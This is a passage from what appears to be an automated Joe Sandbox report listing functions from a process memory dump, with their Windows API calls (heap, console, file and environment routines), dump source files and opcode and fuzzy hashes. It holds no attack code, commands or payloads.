                              • Instruction Fuzzy Hash: 5EF0B721A1CA91D2EB04AF12F484069EA60FB89B91B88A535DE4E07B98CF3CE4859710
                              Function 00007FF744F01130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$CurrentDirectorytowupper
                              • String ID:
                              • API String ID: 1403193329-0
                              • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                              • Instruction ID: d84e1edd602eaed27db92315a5a72bc0c733a42f5e8210dc0cf595f96dac1b90
                              • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                              • Instruction Fuzzy Hash: BF619132A08B42CAE720EF6295842ADB7B4FB84744F984235DE5D476EDDF38D450D710
                              Function 00007FF744F14878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmp$wcschr
                              • String ID:
                              • API String ID: 3270668897-0
                              • Opcode ID: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                              • Instruction ID: 437bf1ad14c5b43571a66523a1766836c19bfadc6cfe3421676cbf389f213ef7
                              • Opcode Fuzzy Hash: c131fa53280227e888b319e24c815cf36435a05d61152e6198fec243a6d9d163
                              • Instruction Fuzzy Hash: 3B514811E0C642C1FB61BF12A4911B9A2B1EF95B90FDC8131CE5E472DEEE2CED41A360
                              Function 00007FF744F13060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F11EA0: wcschr.MSVCRT(?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF744F30D54), ref: 00007FF744F11EB3
                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,0000000A,00007FF744F092AC), ref: 00007FF744F130CA
                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F130DD
                              • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F130F6
                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F13106
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorMode$FullNamePathwcschr
                              • String ID:
                              • API String ID: 1464828906-0
                              • Opcode ID: 4608740039e49971374e978e9372c54a28b1034dfcf154244c984753711d5cb1
                              • Instruction ID: 7c0a4641fc1ba8cb7d65e0c070b025edbe5750a69e2766b5428464767b98cb0d
                              • Opcode Fuzzy Hash: 4608740039e49971374e978e9372c54a28b1034dfcf154244c984753711d5cb1
                              • Instruction Fuzzy Hash: 9031A021A0C652C2F724BF17A4805BEF671EB49B94F9C9234DE8A833D8DE7DAC459310
                              Function 00007FF744F2F358 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DriveFullNamePathType
                              • String ID:
                              • API String ID: 3442494845-0
                              • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                              • Instruction ID: 22a5e247e10b7913f4a09c43adbb3834b03394bb7b8f8ce77387e3917561a4dd
                              • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                              • Instruction Fuzzy Hash: 8F318F32619B81CAEB60EF12E8806E9B3A4FB88B84F884125DA4D47B58CF38D605D710
                              Function 00007FF744F18F80 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                              • Instruction ID: 80a66cdb842b82662a66d7eeeff624c70d0e31042845629544cf515331e0d7b4
                              • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                              • Instruction Fuzzy Hash: DB419265A0DB45C6EB50BF1AF890365A364FB88744F984035DD8D827A8DF3DE854D720
                              Function 00007FF744F18470 Relevance: 6.1, APIs: 4, Instructions: 72stringCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcstol$lstrcmp
                              • String ID:
                              • API String ID: 3515581199-0
                              • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                              • Instruction ID: 5b96df08cdd1bf8d64eb1facd2017f72ac0cdd6bdd026f3b8f00b67ef22036a1
                              • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                              • Instruction Fuzzy Hash: 9E217832A0DA42C3E7657F6A95D413AEBB0FB49790FC95134DF4F026D8CE6CE845A610
                              Function 00007FF744F04F58 Relevance: 6.1, APIs: 4, Instructions: 72filetimeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File_get_osfhandle$TimeWrite
                              • String ID:
                              • API String ID: 4019809305-0
                              • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                              • Instruction ID: 079db09c7829ba1843ba1df1cc296073fa627ce354bee1fbf4f3275e350bc4cc
                              • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                              • Instruction Fuzzy Hash: 24318121A0C652C7E760BF56A4C4238E6A0FB49B50F895638DE0D43BD9CF3DD854A610
                              Function 00007FF744F31914 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$DriveNamePathTypeVolume
                              • String ID:
                              • API String ID: 1029679093-0
                              • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                              • Instruction ID: 093ba220da545bbf06386b6a3a49d482a74f8449ed659bddedbdd9b385686cec
                              • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                              • Instruction Fuzzy Hash: 2D313032709A81CAEB20AF22D9943E9B7A4F749B89F884135CE4D47788DF3CD545D710
                              Function 00007FF744F2E810 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: File$DeleteErrorLastWrite_get_osfhandle
                              • String ID:
                              • API String ID: 2448200120-0
                              • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                              • Instruction ID: 93e70b0856db6d96be0f521e59aed0d5d3f415caa003a1cde70e91c7faebb832
                              • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                              • Instruction Fuzzy Hash: AB210A31A1C646CBF714BF12A480579F7A1FB85B81F984135ED89077D9CE3DE441EA20
                              Function 00007FF744F17CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                              • Instruction ID: 6b3d2f3cdc0e890ae94fae5fa073844f7165552f4aa278ce87c526f98793c942
                              • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                              • Instruction Fuzzy Hash: 2121716160CA45C6EB04BF53A58007AF7A1EB89BD0B899134CE1E037D9DE3CE4019620
                              Function 00007FF744F06A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F13C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F13D0C
                                • Part of subcall function 00007FF744F13C24: towupper.MSVCRT ref: 00007FF744F13D2F
                                • Part of subcall function 00007FF744F13C24: iswalpha.MSVCRT ref: 00007FF744F13D4F
                                • Part of subcall function 00007FF744F13C24: towupper.MSVCRT ref: 00007FF744F13D75
                                • Part of subcall function 00007FF744F13C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F13DBF
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925,?,?,?,?,00007FF744F0B9B1), ref: 00007FF744F06ABF
                              • RtlFreeHeap.NTDLL ref: 00007FF744F06AD3
                                • Part of subcall function 00007FF744F06B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF744F06AE8,?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925), ref: 00007FF744F06B8B
                                • Part of subcall function 00007FF744F06B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF744F06AE8,?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925), ref: 00007FF744F06B97
                                • Part of subcall function 00007FF744F06B84: RtlFreeHeap.NTDLL ref: 00007FF744F06BAF
                                • Part of subcall function 00007FF744F06B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F06AF1,?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925), ref: 00007FF744F06B39
                                • Part of subcall function 00007FF744F06B30: RtlFreeHeap.NTDLL ref: 00007FF744F06B4D
                                • Part of subcall function 00007FF744F06B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F06AF1,?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925), ref: 00007FF744F06B59
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F2EA0F,?,?,?,00007FF744F2E925,?,?,?,?,00007FF744F0B9B1), ref: 00007FF744F06B03
                              • RtlFreeHeap.NTDLL ref: 00007FF744F06B17
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                              • String ID:
                              • API String ID: 3512109576-0
                              • Opcode ID: 382550a8889551dd1746f9e05062d813c656d27a38cd142319c153c86f485295
                              • Instruction ID: 255085466155c8e1eb204e1662d004e05aa02b9da932a27b3d5bbf333e664a4e
                              • Opcode Fuzzy Hash: 382550a8889551dd1746f9e05062d813c656d27a38cd142319c153c86f485295
                              • Instruction Fuzzy Hash: 3C21606190DA82C6FB04FF6694942B8BBA0EB59B44F9C4035CE4E57399DE3CA445E370
                              Function 00007FF744F0B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B6D0
                              • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B6E7
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B701
                              • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0AF82), ref: 00007FF744F0B715
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocSize
                              • String ID:
                              • API String ID: 2549470565-0
                              • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                              • Instruction ID: a0039b3f844da02ea21d110a4223fd014ecda3acfcc89b42d01985dbd3b2f43f
                              • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                              • Instruction Fuzzy Hash: 68210035A1D682C6EB14BF56E584078E6A1FB89B80BCC9431DE4E037D8DF3CE845A720
                              Function 00007FF744F2CFF0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                              Download Yara Rule
                              APIs
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF744F1507A), ref: 00007FF744F2D01C
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF744F1507A), ref: 00007FF744F2D033
                              • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF744F1507A), ref: 00007FF744F2D06D
                              • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF744F1507A), ref: 00007FF744F2D07F
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                              • String ID:
                              • API String ID: 1033415088-0
                              • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                              • Instruction ID: b4c57ada0ce31d2c648cd73465e5423e3ab01b5589bb649765affbf930e643a0
                              • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                              • Instruction Fuzzy Hash: 3911513261CA42C7D744AB12F49417AF7A0FB8AB95F845125EE8E47BD8DF3CD0459B10
                              Function 00007FF744F059E4 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F11EA0: wcschr.MSVCRT(?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF744F30D54), ref: 00007FF744F11EB3
                              • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F05A2E
                              • _open_osfhandle.MSVCRT ref: 00007FF744F05A4F
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF744F0260D), ref: 00007FF744F237AA
                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF744F237D2
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                              • String ID:
                              • API String ID: 22757656-0
                              • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                              • Instruction ID: 2a3f475f99d42162fd99df2ee7e47390c9242faa73e4b6e5540696890243e9d4
                              • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                              • Instruction Fuzzy Hash: 7F116371A1C645C7E750BF25E488339BAA0F789B65F984734DA29073D4CF3CD4459B10
                              Function 00007FF744F25690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF744F25433,?,?,?,00007FF744F269B8,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F256C5
                              • RtlFreeHeap.NTDLL ref: 00007FF744F256D9
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF744F25433,?,?,?,00007FF744F269B8,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F256FD
                              • RtlFreeHeap.NTDLL ref: 00007FF744F25711
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$FreeProcess
                              • String ID:
                              • API String ID: 3859560861-0
                              • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                              • Instruction ID: 5c301ef1b82d7876ed0f3de2d9e79e51c8f448fa5e753a7230d3f8e30c32a0cb
                              • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                              • Instruction Fuzzy Hash: CD112872A08B81C7DB00AF56E4440A8BBA0F749F84B8C8125DF4E03758DF38E456C750
                              Function 00007FF744F19158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                              • Instruction ID: 2ed8f7bbb37a25f7f48e55c1dfb1ce8d1e8a61015825f1e474352e434e02242b
